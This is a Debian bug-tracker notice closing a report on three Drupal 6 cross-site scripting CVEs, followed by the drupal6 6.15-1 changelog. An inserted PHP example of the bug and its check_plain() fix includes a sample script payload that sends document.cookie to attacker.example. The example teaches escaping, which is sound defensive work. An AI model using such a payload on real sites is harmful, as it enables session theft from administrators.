Your message dated Mon, 11 Jan 2010 21:36:31 +0000
with message-id <e1nurw7-0000b4...@ries.debian.org>
and subject line Bug#562165: fixed in drupal6 6.15-1
has caused the Debian Bug report #562165,
regarding CVE-2009-4369, CVE-2009-4370, CVE-2009-4371: Several XSS issues
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
562165: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=562165
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: drupal6
Severity: grave
Tags: security patch
Hi Luigi,
the following CVE (Common Vulnerabilities & Exposures) ids were
published for drupal6.
CVE-2009-4371[0]:
| Cross-site scripting (XSS) vulnerability in the Locale module
| (modules/locale/locale.module) in Drupal Core 6.14, and possibly other
| versions including 6.15, allows remote authenticated users with
| "administer languages" permissions to inject arbitrary web script or
| HTML via the (1) Language name in English or (2) Native language name
| fields in the Custom language form.
CVE-2009-4370[1]:
| Cross-site scripting (XSS) vulnerability in the Menu module
| (modules/menu/menu.admin.inc) in Drupal Core 6.x before 6.15 allows
| remote authenticated users with permissions to create new menus to
| inject arbitrary web script or HTML via a menu description, which is
| not properly handled in the menu administration overview.
CVE-2009-4369[2]:
| Cross-site scripting (XSS) vulnerability in the Contact module
| (modules/contact/contact.admin.inc or modules/contact/contact.module)
| in Drupal Core 5.x before 5.21 and 6.x before 6.15 allows remote
| authenticated users with "administer site-wide contact form"
| permissions to inject arbitrary web script or HTML via the contact
| category name.
If you fix the vulnerabilities please also make sure to include the
CVE ids in your changelog entry.
For the latter two you can find the upstream patch here[3]. The former
issue has the patch here[4].
For lenny, please coordinate with the stable release team and go via
stable-proposed-updates as these issues do not seem to warrant a DSA.
Cheers
Steffen
For further information see:
[0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4371
http://security-tracker.debian.org/tracker/CVE-2009-4371
[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4370
http://security-tracker.debian.org/tracker/CVE-2009-4370
[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4369
http://security-tracker.debian.org/tracker/CVE-2009-4369
[3] http://drupal.org/files/sa-core-2009-009/SA-CORE-2009-009-6.14.patch
[4] http://www.madirish.net/?article=442
--- End Message ---
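The three advisories above describe one defect class: a string that only a privileged user can set (a language name, a menu description, a contact category name) is stored and later rendered into an administration page without being escaped, so the payload runs in the browser of whichever administrator views that page. The PHP below is an added illustration of that pattern and its fix; it is not Drupal's code and not the upstream patch. `overview_row_vulnerable()`, `overview_row_fixed()`, `contains_script_tag()` and the `$menu` array are constructed for this example, and `check_plain()` here is a local stand-in for the Drupal 6 API function of the same name so the script runs without a Drupal install.

```php
<?php
// Added example, not Drupal code. Shows the stored-XSS pattern behind
// CVE-2009-4370 (menu description rendered raw in the admin overview)
// and the usual Drupal 6 fix: escape plain-text fields with check_plain().

// Stand-in for Drupal 6's check_plain(): HTML-escape as plain text.
// Drupal's version also validates UTF-8 first; that step is omitted here.
function check_plain($text) {
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

// Constructed input: a description that a user holding the menu
// administration permission could save. It is plain text to the form,
// but markup to a browser.
$menu = array(
    'title'       => 'Footer links',
    'description' => 'Useful links<script>'
                   . 'document.location="http://attacker.example/?c="+document.cookie'
                   . '</script>',
);

// Vulnerable shape (hypothetical row builder): admin-supplied fields are
// concatenated straight into the overview table's markup.
function overview_row_vulnerable(array $menu) {
    return '<td>' . $menu['title'] . '</td>'
         . '<td>' . $menu['description'] . '</td>';
}

// Fixed shape: every field that is meant to be plain text is escaped
// at the point where it becomes HTML, regardless of who can edit it.
function overview_row_fixed(array $menu) {
    return '<td>' . check_plain($menu['title']) . '</td>'
         . '<td>' . check_plain($menu['description']) . '</td>';
}

// Minimal check used below: is there still a raw <script tag in the output?
function contains_script_tag($html) {
    return stripos($html, '<script') !== false;
}

echo "vulnerable row:\n  ", overview_row_vulnerable($menu), "\n";
echo "fixed row:\n  ", overview_row_fixed($menu), "\n";
echo "script tag survives (vulnerable): ",
     var_export(contains_script_tag(overview_row_vulnerable($menu)), true), "\n";
echo "script tag survives (fixed):      ",
     var_export(contains_script_tag(overview_row_fixed($menu)), true), "\n";
```

Run it with `php example.php`. The point worth keeping from the advisories is that "only administrators can set this field" is not a reason to skip escaping: the permission needed to write the field ("administer languages", create menus, "administer site-wide contact form") is narrower than the audience that reads the page where it is rendered, so the bug lets a limited role run script as a full administrator. check_plain() is the right call for names and descriptions that should never carry markup; fields that legitimately contain HTML go through a whitelist filter such as Drupal 6's filter_xss() instead.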
--- Begin Message ---
Source: drupal6
Source-Version: 6.15-1
We believe that the bug you reported is fixed in the latest version of
drupal6, which is due to be installed in the Debian FTP archive:
drupal6_6.15-1.diff.gz
to main/d/drupal6/drupal6_6.15-1.diff.gz
drupal6_6.15-1.dsc
to main/d/drupal6/drupal6_6.15-1.dsc
drupal6_6.15-1_all.deb
to main/d/drupal6/drupal6_6.15-1_all.deb
drupal6_6.15.orig.tar.gz
to main/d/drupal6/drupal6_6.15.orig.tar.gz
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 562...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Luigi Gangitano <lu...@debian.org> (supplier of updated drupal6 package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.8
Date: Mon, 11 Jan 2010 19:47:13 +0100
Source: drupal6
Binary: drupal6
Architecture: source all
Version: 6.15-1
Distribution: unstable
Urgency: low
Maintainer: Luigi Gangitano <lu...@debian.org>
Changed-By: Luigi Gangitano <lu...@debian.org>
Description:
drupal6 - a fully-featured content management framework
Closes: 561726 562165
Changes:
drupal6 (6.15-1) unstable; urgency=low
.
* New upstream release (Closes: #561726)
- Fixes several XSS vulnerabilities (Closes: #562165)
(Ref: SA-CORE-2009-009, CVE-2009-4369, CVE-2009-4370, CVE-2009-4371)
.
* debian/rules
- Use dh_prep instead of dh_clean -k
.
* debian/control
- Upgraded versioned dependency on debhelper to 7
.
* debian/README.source
- Added directions on source handling
Checksums-Sha1:
2dd7821242bc6a972375d109babd253f45cddf2a 1113 drupal6_6.15-1.dsc
5be5ebf85c9ffa33e71c5a0f05d1308d3af19ab8 1085634 drupal6_6.15.orig.tar.gz
c178f2447fb53415659efbdeaf8c66b2e24fcdcf 16812 drupal6_6.15-1.diff.gz
1eb147ba1b2dca112fca2a879e85a88e8a840c73 1117888 drupal6_6.15-1_all.deb
Checksums-Sha256:
0cbd2dc00e7adcc3a8e4f915ab020daba96fa5168e77419783606245d662ad46 1113 drupal6_6.15-1.dsc
eff5f840ebc104698846e9a1b3977829ca65c8a4ff892f4656790584225bf9a1 1085634 drupal6_6.15.orig.tar.gz
4f5feffe27958946eb4fde05be42c04b87d6c8abea2d7352d17ed74df8dc0d60 16812 drupal6_6.15-1.diff.gz
379022c41b47dfd29b0d98facbb502090551e5369939c68e2224c9472032d4c5 1117888 drupal6_6.15-1_all.deb
Files:
28196e7b433e501ebca8d8c92cd608be 1113 web extra drupal6_6.15-1.dsc
43c60bde08d6ea67682a998c2804c357 1085634 web extra drupal6_6.15.orig.tar.gz
d782866c274d778c8572582fa220187b 16812 web extra drupal6_6.15-1.diff.gz
bd4b14120e4795f37bcef2e69197d5e0 1117888 web extra drupal6_6.15-1_all.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (Darwin)
iEYEARECAAYFAktLkuIACgkQ8ZumGJJMDCYekgCdGRgT4zWCSqVJF8ew/o54325D
xDQAnjcuooZ1piQpQBCKMgnNQ0eFxYhD
=0S4x
-----END PGP SIGNATURE-----
--- End Message ---